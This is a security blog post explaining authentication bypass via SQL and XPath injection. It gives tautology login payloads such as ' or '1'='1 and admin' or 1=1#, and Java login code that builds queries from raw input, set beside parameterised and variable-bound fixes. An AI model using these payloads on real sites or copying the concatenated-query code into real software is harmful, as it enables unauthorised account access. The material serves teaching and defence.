Authentication Bypass — With XPath injection and SQL injection | CyberVerse

Shaurya Sharma, published in Cyber Verse, Dec 27, 2019
Authentication Bypass

Authentication bypass, for websites and web applications, means gaining access without valid credentials to the administrative section of a site, or to the sections and scripts that interact directly with the database or the server's file system.

Authentication bypass can be achieved by exploiting vulnerabilities in the site's own code, mistakes made when publishing the site, and misconfiguration or vulnerabilities in the server software.

Being able to bypass authentication on a site amounts to a compromise of the site, because:

The attacker enters the administrative section of the site with the highest access level.

The attacker gains access to private sections of the site, or to scripts that interact directly with the database or the server's file system.

A few examples of authentication bypass:

{ SQL injection Authentication Bypass }

Username = ' or '1'='1
Password = ' or '1'='1

OR

username = admin' or 1=1#
password = ' or '1'='1

OR (where an e-mail address is required)

Username = admin@admin.com
Password = ' or '1'='1

In each case the quote in the payload closes the string literal the application opened, and the tautology '1'='1' (or 1=1) makes the WHERE clause true for every row, so the query returns a user even though no valid password was supplied. In the second payload the # starts a MySQL comment, so everything after it, including the password check, is discarded. The row returned is usually the first one in the table, which is very often the administrator.
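Added example, not from the original post: a JDBC login that builds the query by string concatenation, beside the same query with bound parameters, run against the payloads above. It assumes the sqlite-jdbc driver is on the classpath, so that "jdbc:sqlite::memory:" opens an in-memory database; the users table is constructed sample data. The # comment in the second payload is MySQL syntax, so the SQLite run uses "--", the equivalent line comment there.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

// Added example (not the post's code). Assumes the sqlite-jdbc driver is on the
// classpath; the table and the two users are constructed sample data.
public class SqlAuthBypassDemo {

    // Vulnerable: the user-controlled strings are pasted into the SQL text, so a
    // quote in the input ends the literal and the rest is parsed as SQL.
    static String loginVulnerable(Connection conn, String username, String password)
            throws SQLException {
        String sql = "SELECT id FROM users WHERE username = '" + username
                + "' AND password = '" + password + "'";
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return rs.next() ? rs.getString("id") : null;
        }
    }

    // Hardened: the same query with bound parameters. The quotes and keywords in the
    // payload travel as data, so the WHERE clause keeps its structure.
    static String loginSafe(Connection conn, String username, String password)
            throws SQLException {
        String sql = "SELECT id FROM users WHERE username = ? AND password = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username);
            ps.setString(2, password);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("id") : null;
            }
        }
    }

    public static void main(String[] args) throws SQLException {
        try (Connection conn = DriverManager.getConnection("jdbc:sqlite::memory:");
             Statement st = conn.createStatement()) {
            st.executeUpdate("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
            st.executeUpdate("INSERT INTO users VALUES (1, 'admin', 'adminpass'), (2, 'user', 'userpass')");

            String tautology = "' or '1'='1";

            // Payload in both fields. The WHERE clause becomes
            //   username = '' or '1'='1' AND password = '' or '1'='1'
            // which, because AND binds tighter than OR, is true for every row.
            System.out.println(loginVulnerable(conn, tautology, tautology));

            // Known e-mail address plus the tautology in the password field only:
            //   username = 'admin@admin.com' AND password = '' or '1'='1'
            System.out.println(loginVulnerable(conn, "admin@admin.com", tautology));

            // The post's "admin' or 1=1#" form, with SQLite's "--" in place of MySQL's "#":
            //   username = 'admin' or 1=1--' AND password = 'anything'
            // Everything after "--" is a comment, so the password check disappears.
            System.out.println(loginVulnerable(conn, "admin' or 1=1--", "anything"));

            // The same inputs through the parameterised query: no row has that
            // literal username or password, so the lookup fails.
            System.out.println(loginSafe(conn, tautology, tautology));
            System.out.println(loginSafe(conn, "admin' or 1=1--", "anything"));
        }
    }
}
```

Each of the three vulnerable calls returns the id of the first row in the table, the admin, without the admin password ever being supplied; both parameterised calls return null. The fix is not escaping quotes by hand but never letting user input reach the SQL parser as code, which is what bound parameters guarantee.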

{ XPath injection Authentication Bypass }

This works the same way as SQL injection, but against an XPath query over an XML document instead of a SQL query over a database:

Part of the site's XML user database, users.xml:

<?xml version='1.0' encoding='ISO-8859-1'?>
<users>
<user>
<id>1</id>
<username>admin</username>
<password>adminpass</password>
</user>
<user>
<id>2</id>
<username>user</username>
<password>userpass</password>
</user>
</users>

Authentication code for users and site administrators (vulnerable: the request parameters are concatenated straight into the XPath expression):

import java.io.File;
import java.io.FileInputStream;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathExpression;
import javax.xml.xpath.XPathFactory;
import org.xml.sax.InputSource;

String username = req.getParameter("username");   // attacker-controlled, used unescaped below
String password = req.getParameter("password");   // attacker-controlled, used unescaped below
XPathFactory factory = XPathFactory.newInstance();
XPath xpath = factory.newXPath();
File file = new File("/usr/webappdata/users.xml");
InputSource src = new InputSource(new FileInputStream(file));
XPathExpression expr = xpath.compile("//users/user[username/text()='" + username
        + "' and password/text()='" + password + "']/id/text()");
String id = expr.evaluate(src);   // id of the first matching user, or "" if none

Legitimate XPath user-authentication query:

//users/user[username/text()='admin' and password/text()='adminpass']/id/text()

XPath injection (submitted as the password):
' or '1'='1

The query after the injection:
//users/user[username/text()='admin' and password/text()='' or '1'='1']/id/text()

Result:
The attacker is authenticated. In XPath, and binds tighter than or, so the predicate reads (username='admin' and password='') or '1'='1', which is true for every <user> element. evaluate() returns the string value of the first matching node in document order, so the expression returns the id of the first user in the file, the admin, without the admin password ever being known. Note that the payload closes the quote the code opened and leaves the code's own trailing quote to close the final literal: XPath 1.0 has no comment syntax, so unlike the SQL case the rest of the expression cannot simply be discarded and must remain syntactically valid.
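Added example, not the post's own code: the vulnerable lookup from the code above, beside a hardened version that passes the inputs to the expression as XPath variables through JAXP's XPathVariableResolver, run against the users.xml content embedded inline as a constructed string. Variables are the XPath equivalent of bound parameters: the input is compared as a value and never parsed as part of the expression, so quotes in it cannot change the predicate.

```java
import java.io.StringReader;
import javax.xml.namespace.QName;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathExpression;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.xml.sax.InputSource;

// Added example (not the post's code). USERS_XML is the post's users.xml content,
// constructed inline so the demo runs without a file on disk.
public class XPathAuthBypassDemo {

    static final String USERS_XML =
        "<users>"
      + "<user><id>1</id><username>admin</username><password>adminpass</password></user>"
      + "<user><id>2</id><username>user</username><password>userpass</password></user>"
      + "</users>";

    // Vulnerable: same construction as the post's code, concatenating both inputs
    // into the expression text.
    static String lookupVulnerable(String username, String password)
            throws XPathExpressionException {
        XPath xpath = XPathFactory.newInstance().newXPath();
        String expr = "//users/user[username/text()='" + username
                + "' and password/text()='" + password + "']/id/text()";
        // evaluate() with the default STRING return type gives the string value of the
        // first node in document order, so a predicate that is true for every <user>
        // returns the first user's id, which here is the admin's.
        return xpath.evaluate(expr, new InputSource(new StringReader(USERS_XML)));
    }

    // Hardened: XPath 1.0 has no prepared statements, but the JAXP API lets the
    // expression reference variables ($username, $password) that are resolved at
    // evaluation time. The input strings are never part of the expression's syntax.
    static String lookupSafe(String username, String password)
            throws XPathExpressionException {
        XPath xpath = XPathFactory.newInstance().newXPath();
        xpath.setXPathVariableResolver((QName name) -> {
            switch (name.getLocalPart()) {
                case "username": return username;
                case "password": return password;
                default:         return null;   // unknown variable: evaluation fails
            }
        });
        XPathExpression expr = xpath.compile(
            "//users/user[username/text()=$username and password/text()=$password]/id/text()");
        return expr.evaluate(new InputSource(new StringReader(USERS_XML)));
    }

    public static void main(String[] args) throws XPathExpressionException {
        String tautology = "' or '1'='1";

        // Predicate becomes: username/text()='admin' and password/text()='' or '1'='1'
        // ('and' binds tighter than 'or', so every <user> matches).
        System.out.println(lookupVulnerable("admin", tautology));

        // Same inputs through variables: no <user> has that literal password,
        // so no node matches and evaluate() returns the empty string.
        System.out.println(lookupSafe("admin", tautology));

        // Legitimate credentials still work through the hardened path.
        System.out.println(lookupSafe("admin", "adminpass"));
    }
}
```

The vulnerable call returns "1" (the admin's id) for the tautology password, the hardened call returns "" for it and "1" only for the real password. Because evaluate() hands back the first match, the vulnerable code does not even require the attacker to know a username: any <user> in the file satisfies the injected predicate, and the admin is simply the one listed first.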

#HappyHacking #CyberVerse #BugBounty #Togherwehitharder
